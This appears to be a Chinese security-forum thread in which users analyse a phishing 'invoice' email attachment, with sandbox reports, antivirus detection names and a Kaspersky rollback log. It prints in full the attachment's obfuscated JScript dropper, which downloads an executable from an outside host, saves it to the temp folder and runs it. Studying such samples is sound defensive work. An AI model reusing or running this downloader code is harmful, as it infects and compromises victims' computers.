邮箱附件，已鉴定为病毒

Autonomous

刚吃完饭间收到一个邮件，说让我查看一个invoice，附件压缩包里包含两个文件，一个js，另一个后缀名是x

其中，d91fc.js文件可由文本编辑器直接打开：

[mw_shl_code=javascript,true]var Ntuhecwob = false;
var Nwfcsc = "CreateObject";
var Xorjijbxoc = function Mgzibamr() {return WScript[Nwfcsc]("WScript.Shell");}();
var Vdvwqx = 123213;
var Ohtselho = "MSXML2.XMLHTTP";
var Upbgsig = 2123213;
var Vgnixtcg = 0;
function Vpznew(Kexfgpv){Xorjijbxoc["Run"](Kexfgpv, Vgnixtcg, Vgnixtcg);};
function Biwuibbnmk(){return Ohtselho;};
function Gxeguwu(Pwuohon, Qftsmrf){return Pwuohon - Qftsmrf;};
function Wuamxcu(){return Nwfcsc;};
/*@cc_on
  @if (@_win32 || @_win64)
    Ntuhecwob = true;
  @end
@*/
if (Ntuhecwob)
{
var Rtnlllilo = "";
function Npwkosm(){return 22;};
var Awimhkeatd = 0; var Hrqnwpqsq = 0;
function Idtjpeaffp()
{
var Aenqgobt = new this["Date"]();
var Ujlxetxch = Aenqgobt["getUTCMilliseconds"]();
WScript["Sleep"](Npwkosm());
var Aenqgobt = new this["Date"]();
var Ljgbxrdt = Aenqgobt["getUTCMilliseconds"]();
WScript["Sleep"](Npwkosm());
var Aenqgobt = new this["Date"]();
var Toelaxxa = Aenqgobt["getUTCMilliseconds"]();
var Awimhkeatd = "Vuslmobcu";
Awimhkeatd = Gxeguwu(Ljgbxrdt, Ujlxetxch);
var Hrqnwpqsq = "Vslmh";
Hrqnwpqsq = Gxeguwu(Toelaxxa, Ljgbxrdt);
Rtnlllilo = "open";
return Gxeguwu(Awimhkeatd, Hrqnwpqsq);
}
var Kokwzaygsj = false;
var Demzbv = false;
for (var Oexwevbvo = Vgnixtcg; Oexwevbvo < Npwkosm() * 1; Oexwevbvo++){if (Idtjpeaffp() != Vgnixtcg){
Kokwzaygsj = true;
Hrqnwpqsq = "31" + 11 * Awimhkeatd + Hrqnwpqsq;
Demzbv = true;
break;
}}
function Gdjpob() {return ((Kokwzaygsj == true) && (Kokwzaygsj == Demzbv)) ? 1 : Vgnixtcg;};
if (Kokwzaygsj && Gdjpob() && Demzbv){
function Wductbew() {return Xorjijbxoc["ExpandEnvironmentStrings"]("%TEMP%/") + "E69VQhUZVgtIRjRI.exe";};
Ixleqyqqgb = Biwuibbnmk();
Tlrimzvmnv = WScript[Nwfcsc](Ixleqyqqgb);
var Zjcvk = 1;
while (Zjcvk){
try {
Tlrimzvmnv[Rtnlllilo]("GET", "http://importtoys.nl/d9owla", false);
Tlrimzvmnv["send"]();
Sznnpk = "Sleep";
do {WScript[Sznnpk](Npwkosm() * 11)} while (Tlrimzvmnv["readystate"] < 2 * 2);
Zjcvk = Vgnixtcg;
} catch(Iksdcley){};
}
function Wfbni(Dqgyinph) {var Fbzqrlhv = (1, 2, 3, 4, 5, Dqgyinph); return Fbzqrlhv;};
Qykdrbt = WScript[Wuamxcu()]("ADODB.Stream");
Ixleqyqqgb = Qykdrbt;
Ixleqyqqgb[Rtnlllilo]();
Ixleqyqqgb["type"] = Wfbni(1);
Ixleqyqqgb["write"](Tlrimzvmnv["ResponseBody"]);
Qykdrbt["position"] = Wfbni(Vgnixtcg);
Ixleqyqqgb["Save" + "ToFile"](Wductbew(), 2);
Qykdrbt["c"+"lose"]();
Xwxojrgsha = Wductbew();
Vpznew(Xwxojrgsha);
}
}[/mw_shl_code]

---

以下为可以文件，解压密码为suspicious

Autonomous

以下是这两个文件的在线分析结果：

d91fc.js：

哈勃分析系统：高度风险


关键行为有：
[mw_shl_code=css,true]行为描述：        设置特殊文件夹属性
详情信息：       
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5
C:\Documents and Settings\Administrator\Local Settings\History
C:\Documents and Settings\Administrator\Local Settings\History\History.IE5
C:\Documents and Settings\Administrator\Cookies
C:\Documents and Settings\Administrator\IETldCache
行为描述：        获取TickCount值
详情信息：       
TickCount = 544250, SleepMilliseconds = 60000.
TickCount = 544296, SleepMilliseconds = 60000.
TickCount = 544312, SleepMilliseconds = 60000.
TickCount = 544343, SleepMilliseconds = 60000.
TickCount = 544375, SleepMilliseconds = 60000.
TickCount = 544437, SleepMilliseconds = 60000.
TickCount = 544453, SleepMilliseconds = 60000.
TickCount = 544468, SleepMilliseconds = 60000.
TickCount = 544484, SleepMilliseconds = 60000.
TickCount = 544500, SleepMilliseconds = 60000.
TickCount = 544515, SleepMilliseconds = 60000.
TickCount = 544531, SleepMilliseconds = 60000.
TickCount = 544546, SleepMilliseconds = 60000.
TickCount = 544562, SleepMilliseconds = 60000.
TickCount = 544718, SleepMilliseconds = 60000.[/mw_shl_code]

---

金山火眼：

其他行为监控
行为描述：IE 代{过}{滤}理服务器设置
附加信息：关闭IE代{过}{滤}理服务

网络操作
[HTTP Request]GET importtoys.nl/d9owla
[Open URL]importtoys.nl

---

VirSCAN：扫描结果:2%的杀软(1/39)报告发现病毒

SOPHOS        5.17        3.60.0        2015-08-01        Mal/JSDldr-B

haol

從樓主文件下載的執行檔

Autonomous

WLl.x：

金山火眼：

其他行为监控
行为描述：查找文件
附加信息："C:\Program Files""%ProgramFiles%\
.*""%windir%\
.*""%system%\Wbem\
.*""%system%\
.*"
行为描述：遍历磁盘类型
附加信息：C:

---

VirSCAN：
扫描结果:0%的杀软(0/39)报告发现病毒

Autonomous

haol 发表于 2016-3-29 19:01
從樓主文件下載的執行檔

E69VQhUZVgtIRjRI.exe的在线扫描结果：

哈勃：未发现风险

[mw_shl_code=css,true]行为描述：        设置特殊文件夹属性
详情信息：       
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5
C:\Documents and Settings\Administrator\Local Settings\History
C:\Documents and Settings\Administrator\Local Settings\History\History.IE5
C:\Documents and Settings\Administrator\Cookies
行为描述：        获取TickCount值
详情信息：       
TickCount = 532781, SleepMilliseconds = 47000.
TickCount = 532843, SleepMilliseconds = 47000.
TickCount = 532859, SleepMilliseconds = 47000.
TickCount = 532875, SleepMilliseconds = 47000.
TickCount = 532890, SleepMilliseconds = 47000.
TickCount = 532906, SleepMilliseconds = 47000.
TickCount = 532921, SleepMilliseconds = 47000.
TickCount = 532937, SleepMilliseconds = 47000.
TickCount = 532953, SleepMilliseconds = 47000.
TickCount = 532968, SleepMilliseconds = 47000.
TickCount = 532984, SleepMilliseconds = 47000.
TickCount = 533156, SleepMilliseconds = 47000.
TickCount = 533218, SleepMilliseconds = 47000.
TickCount = 533234, SleepMilliseconds = 47000.
TickCount = 533250, SleepMilliseconds = 47000.[/mw_shl_code]

---

VirSCAN：扫描结果:5%的杀软(2/39)报告发现病毒

F-PROT        4.6.2.117        6.5.1.5418        2016-02-05        W32/Felix:CO:VC!Eldorado        1
奇虎360        1.0.1        1.0.1        1.0.1        HEUR/QVM20.1.Malware.Gen        6

saga3721

文件 ID         文件名         大小(字节)         结果
28769526         E69VQhUZVgtIRjRI.exe         163 KB         UNDER ANALYSIS
28769538         d91fc.js         2.41 KB         UNDER ANALYSIS
28769539         WLl.x         4.5 KB         UNDER ANALYSIS

cfhdrty

卡巴运行4分钟后主防杀衍生物并回滚。这个，难道是报了两次毒而且回滚了两次？那几个注册表值好像回滚了两次，要被玩坏了
[mw_shl_code=css,true]29.03.2016 19.37.18        恶意程序的操作已回滚        not-a-virus:PDM:RiskTool.Win32.DelShad.ra        应用程序名称: C:\Documents and Settings\Administrator\Local Settings\Temp\E69VQhUZVgtIRjRI.exe        应用程序路径: c:\documents and settings\administrator\local settings\temp\e69vqhuzvgtirjri.exe        时间: 2016/3/29 19:37
29.03.2016 19.37.18        回滚恶意程序的操作时注册表键值被恢复        HKEY_USERS\s-1-5-21-854245398-1979792683-682003330-500\software\microsoft\windows\currentversion\internet settings\connections\savedlegacysettings        对象: HKEY_USERS\s-1-5-21-854245398-1979792683-682003330-500\software\microsoft\windows\currentversion\internet settings\connections\savedlegacysettings        应用程序名称: C:\Documents and Settings\Administrator\Local Settings\Temp\E69VQhUZVgtIRjRI.exe        应用程序路径: c:\documents and settings\administrator\local settings\temp\e69vqhuzvgtirjri.exe        时间: 2016/3/29 19:37
29.03.2016 19.37.18        回滚恶意程序的操作时注册表键值被恢复        HKEY_LOCAL_MACHINE\system\controlset001\hardware profiles\0001\software\microsoft\windows\currentversion\internet settings\proxyenable        对象: HKEY_LOCAL_MACHINE\system\controlset001\hardware profiles\0001\software\microsoft\windows\currentversion\internet settings\proxyenable        应用程序名称: C:\Documents and Settings\Administrator\Local Settings\Temp\E69VQhUZVgtIRjRI.exe        应用程序路径: c:\documents and settings\administrator\local settings\temp\e69vqhuzvgtirjri.exe        时间: 2016/3/29 19:37
29.03.2016 19.37.18        回滚恶意程序的操作时注册表键值被恢复        HKEY_USERS\s-1-5-21-854245398-1979792683-682003330-500\software\microsoft\windows\currentversion\internet settings\autoconfigurl        对象: HKEY_USERS\s-1-5-21-854245398-1979792683-682003330-500\software\microsoft\windows\currentversion\internet settings\autoconfigurl        应用程序名称: C:\Documents and Settings\Administrator\Local Settings\Temp\E69VQhUZVgtIRjRI.exe        应用程序路径: c:\documents and settings\administrator\local settings\temp\e69vqhuzvgtirjri.exe        时间: 2016/3/29 19:37
29.03.2016 19.37.18        回滚恶意程序的操作时注册表键值被恢复        HKEY_USERS\s-1-5-21-854245398-1979792683-682003330-500\software\microsoft\windows\currentversion\internet settings\proxyoverride        对象: HKEY_USERS\s-1-5-21-854245398-1979792683-682003330-500\software\microsoft\windows\currentversion\internet settings\proxyoverride        应用程序名称: C:\Documents and Settings\Administrator\Local Settings\Temp\E69VQhUZVgtIRjRI.exe        应用程序路径: c:\documents and settings\administrator\local settings\temp\e69vqhuzvgtirjri.exe        时间: 2016/3/29 19:37
29.03.2016 19.37.18        回滚恶意程序的操作时注册表键值被恢复        HKEY_USERS\s-1-5-21-854245398-1979792683-682003330-500\software\microsoft\windows\currentversion\internet settings\proxyserver        对象: HKEY_USERS\s-1-5-21-854245398-1979792683-682003330-500\software\microsoft\windows\currentversion\internet settings\proxyserver        应用程序名称: C:\Documents and Settings\Administrator\Local Settings\Temp\E69VQhUZVgtIRjRI.exe        应用程序路径: c:\documents and settings\administrator\local settings\temp\e69vqhuzvgtirjri.exe        时间: 2016/3/29 19:37
29.03.2016 19.37.18        回滚恶意程序的操作时注册表键值被恢复        HKEY_USERS\s-1-5-21-854245398-1979792683-682003330-500\software\microsoft\windows\currentversion\internet settings\proxyenable        对象: HKEY_USERS\s-1-5-21-854245398-1979792683-682003330-500\software\microsoft\windows\currentversion\internet settings\proxyenable        应用程序名称: C:\Documents and Settings\Administrator\Local Settings\Temp\E69VQhUZVgtIRjRI.exe        应用程序路径: c:\documents and settings\administrator\local settings\temp\e69vqhuzvgtirjri.exe        时间: 2016/3/29 19:37
29.03.2016 19.37.18        回滚恶意程序的操作时注册表键值被恢复        HKEY_USERS\s-1-5-21-854245398-1979792683-682003330-500\software\microsoft\windows\currentversion\internet settings\migrateproxy        对象: HKEY_USERS\s-1-5-21-854245398-1979792683-682003330-500\software\microsoft\windows\currentversion\internet settings\migrateproxy        应用程序名称: C:\Documents and Settings\Administrator\Local Settings\Temp\E69VQhUZVgtIRjRI.exe        应用程序路径: c:\documents and settings\administrator\local settings\temp\e69vqhuzvgtirjri.exe        时间: 2016/3/29 19:37
29.03.2016 19.37.00        恶意程序已删除        not-a-virus:PDM:RiskTool.Win32.DelShad.ra        应用程序名称: C:\Documents and Settings\Administrator\Local Settings\Temp\E69VQhUZVgtIRjRI.exe        应用程序路径: c:\documents and settings\administrator\local settings\temp\e69vqhuzvgtirjri.exe        时间: 2016/3/29 19:37
29.03.2016 19.37.00        检测到恶意程序        not-a-virus:PDM:RiskTool.Win32.DelShad.ra        应用程序名称: C:\Documents and Settings\Administrator\Local Settings\Temp\E69VQhUZVgtIRjRI.exe        应用程序路径: c:\documents and settings\administrator\local settings\temp\e69vqhuzvgtirjri.exe        时间: 2016/3/29 19:37
29.03.2016 19.36.59        恶意程序的操作已回滚        PDM:Trojan.Win32.Generic        应用程序名称: C:\Documents and Settings\Administrator\Local Settings\Temp\E69VQhUZVgtIRjRI.exe        应用程序路径: c:\documents and settings\administrator\local settings\temp\e69vqhuzvgtirjri.exe        时间: 2016/3/29 19:36
29.03.2016 19.36.59        回滚恶意程序的操作时注册表键值被恢复        HKEY_LOCAL_MACHINE\system\controlset001\hardware profiles\0001\software\microsoft\windows\currentversion\internet settings\proxyenable        对象: HKEY_LOCAL_MACHINE\system\controlset001\hardware profiles\0001\software\microsoft\windows\currentversion\internet settings\proxyenable        应用程序名称: C:\Documents and Settings\Administrator\Local Settings\Temp\E69VQhUZVgtIRjRI.exe        应用程序路径: c:\documents and settings\administrator\local settings\temp\e69vqhuzvgtirjri.exe        时间: 2016/3/29 19:36
29.03.2016 19.36.59        回滚恶意程序的操作时注册表键值被恢复        HKEY_USERS\s-1-5-21-854245398-1979792683-682003330-500\software\microsoft\windows\currentversion\internet settings\connections\savedlegacysettings        对象: HKEY_USERS\s-1-5-21-854245398-1979792683-682003330-500\software\microsoft\windows\currentversion\internet settings\connections\savedlegacysettings        应用程序名称: C:\Documents and Settings\Administrator\Local Settings\Temp\E69VQhUZVgtIRjRI.exe        应用程序路径: c:\documents and settings\administrator\local settings\temp\e69vqhuzvgtirjri.exe        时间: 2016/3/29 19:36
29.03.2016 19.36.59        回滚恶意程序的操作时注册表键值被恢复        HKEY_USERS\s-1-5-21-854245398-1979792683-682003330-500\software\microsoft\windows\currentversion\internet settings\proxyenable        对象: HKEY_USERS\s-1-5-21-854245398-1979792683-682003330-500\software\microsoft\windows\currentversion\internet settings\proxyenable        应用程序名称: C:\Documents and Settings\Administrator\Local Settings\Temp\E69VQhUZVgtIRjRI.exe        应用程序路径: c:\documents and settings\administrator\local settings\temp\e69vqhuzvgtirjri.exe        时间: 2016/3/29 19:36
29.03.2016 19.36.59        回滚恶意程序的操作时注册表键值被恢复        HKEY_USERS\s-1-5-21-854245398-1979792683-682003330-500\software\microsoft\windows\currentversion\internet settings\proxyserver        对象: HKEY_USERS\s-1-5-21-854245398-1979792683-682003330-500\software\microsoft\windows\currentversion\internet settings\proxyserver        应用程序名称: C:\Documents and Settings\Administrator\Local Settings\Temp\E69VQhUZVgtIRjRI.exe        应用程序路径: c:\documents and settings\administrator\local settings\temp\e69vqhuzvgtirjri.exe        时间: 2016/3/29 19:36
29.03.2016 19.36.59        回滚恶意程序的操作时注册表键值被恢复        HKEY_USERS\s-1-5-21-854245398-1979792683-682003330-500\software\microsoft\windows\currentversion\internet settings\proxyoverride        对象: HKEY_USERS\s-1-5-21-854245398-1979792683-682003330-500\software\microsoft\windows\currentversion\internet settings\proxyoverride        应用程序名称: C:\Documents and Settings\Administrator\Local Settings\Temp\E69VQhUZVgtIRjRI.exe        应用程序路径: c:\documents and settings\administrator\local settings\temp\e69vqhuzvgtirjri.exe        时间: 2016/3/29 19:36
29.03.2016 19.36.59        回滚恶意程序的操作时注册表键值被恢复        HKEY_USERS\s-1-5-21-854245398-1979792683-682003330-500\software\microsoft\windows\currentversion\internet settings\autoconfigurl        对象: HKEY_USERS\s-1-5-21-854245398-1979792683-682003330-500\software\microsoft\windows\currentversion\internet settings\autoconfigurl        应用程序名称: C:\Documents and Settings\Administrator\Local Settings\Temp\E69VQhUZVgtIRjRI.exe        应用程序路径: c:\documents and settings\administrator\local settings\temp\e69vqhuzvgtirjri.exe        时间: 2016/3/29 19:36
29.03.2016 19.36.59        回滚恶意程序的操作时注册表键值被恢复        HKEY_USERS\s-1-5-21-854245398-1979792683-682003330-500\software\microsoft\windows\currentversion\internet settings\migrateproxy        对象: HKEY_USERS\s-1-5-21-854245398-1979792683-682003330-500\software\microsoft\windows\currentversion\internet settings\migrateproxy        应用程序名称: C:\Documents and Settings\Administrator\Local Settings\Temp\E69VQhUZVgtIRjRI.exe        应用程序路径: c:\documents and settings\administrator\local settings\temp\e69vqhuzvgtirjri.exe        时间: 2016/3/29 19:36
29.03.2016 19.36.42        恶意程序已删除        PDM:Trojan.Win32.Generic        应用程序名称: C:\Documents and Settings\Administrator\Local Settings\Temp\E69VQhUZVgtIRjRI.exe        应用程序路径: c:\documents and settings\administrator\local settings\temp\e69vqhuzvgtirjri.exe        时间: 2016/3/29 19:36
29.03.2016 19.36.06        恶意程序已终止        PDM:Trojan.Win32.Generic        应用程序名称: Advanced Task Scheduler 32-bit Edition        应用程序路径: C:\Documents and Settings\Administrator\Local Settings\Temp\E69VQhUZVgtIRjRI.exe        时间: 2016/3/29 19:36
29.03.2016 19.36.04        检测到恶意程序        PDM:Trojan.Win32.Generic        应用程序名称: Advanced Task Scheduler 32-bit Edition        应用程序路径: c:\documents and settings\administrator\local settings\temp\e69vqhuzvgtirjri.exe        时间: 2016/3/29 19:36[/mw_shl_code]

icedream89

ess9

Luca.l

liu浪的人